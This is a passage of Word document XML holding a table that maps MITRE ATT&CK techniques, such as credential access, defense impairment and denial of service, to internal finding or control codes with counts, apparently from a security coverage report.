                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1552.004 Unsecured Credentials: Private Keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SEC-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1078 Valid Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1078.004 Valid Accounts: Cloud Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-06, SEC-03, SEC-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1562 Impair Defenses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1562.001 Impair Defenses: Disable or Modify Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-03, APP-04, APP-08, DET-02, DET-03, DET-04, DET-05, DET-06, DET-07, PB1-01, PB2-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1036 Masquerading</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-04, DET-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1027 Obfuscated Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-06, CF-08, CF-16, DET-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1070 Indicator Removal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-09, DET-03, DET-04, PB1-02, PB1-07, PB2-02, PB2-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1565 Data Manipulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-02, CF-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1565.001 Data Manipulation: Stored Data Manipulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-01, CF-09, DEP-02, PB2-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1531 Account Access Removal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-03, PB2-09, PB2-10, PB2-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1489 Service Stop</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-01, PB1-03, PB2-09, PB2-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1498 Network Denial of Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1499 Endpoint Denial of Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-04, CF-05, CF-07, CF-14, CI-05, PB1-12, PB1-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1566 Phishing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1204.002 User Execution: Malicious File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1114 Email Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1203 Exploitation for Client Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-04, PB2-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1557 Adversary-in-the-Middle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-03, PB2-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1087 Account Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-04, SEC-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1098 Account Manipulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1550 Use Alternate Authentication Material</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SEC-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1105 Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1574.007 Hijack Execution Flow: Path Interception by PATH Environment Variable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-08, DEP-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
